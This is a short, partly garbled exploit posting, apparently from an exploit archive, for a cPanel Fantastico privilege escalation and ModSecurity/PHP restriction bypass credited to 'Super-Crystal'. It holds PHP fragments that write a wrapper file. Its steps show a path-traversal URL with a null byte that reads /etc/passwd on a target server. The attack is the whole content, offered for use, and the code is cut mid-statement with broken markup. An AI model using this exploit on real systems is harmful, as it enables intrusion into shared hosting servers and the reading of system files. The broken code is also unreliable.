Script : Cpanel 11.x bug : language.php [edite file] exploit=Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass" safemode off , mod_security off Disable functions : All NONE ,access root folder '; fwrite($h,$prctl); fclose($h); $handle = fopen($_POST['php'], "w"); fwrite($handle, $phpwrapper); fclose($handle); echo "Building exploit...
"; echo "coding by Super-Crystal
"; echo "Cleaning up
"; echo "Done!
"; } else { echo "error : ".php_uname(); } } else { ?>

Deadly Script

Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"

Exploit:
change
" />

1- change /home/[user]/.fantasticodata/language.php
2- click on the submit
3- now put it like this (e.g) : http://www.xxxx.com:2082/frontend/x3/fantastico/index.php?sup3r=../../../../../../etc/passwd%00 .
Written: 10.10.2008
Public: 26.11.2008
Author : Super-Crystal
Arab4services.net
arab4services.net